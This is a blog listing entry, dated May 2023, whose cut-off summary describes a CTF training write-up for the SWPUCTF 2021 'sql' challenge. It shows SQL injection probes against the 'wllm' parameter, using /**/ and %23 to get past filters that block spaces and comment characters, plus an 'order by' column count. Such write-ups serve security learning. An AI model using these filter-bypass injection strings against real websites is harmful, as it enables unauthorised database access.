2023年5月3日
5.3
摘要: CTF集训 [SWPUCTF 2021 新生赛]sql 告诉了参数是wllm ?wllm=1' and 1=1# 有过滤,手测了一下,发现过滤了注释符,空格 # --> %23 --> /**/ ?wllm=-1'/**/order/**/by/**/3%23 ?wllm=-1'/**/order/ 阅读全文
posted @ 2023-05-03 20:38 Bamboo22 阅读(154) 评论(0) 推荐(0)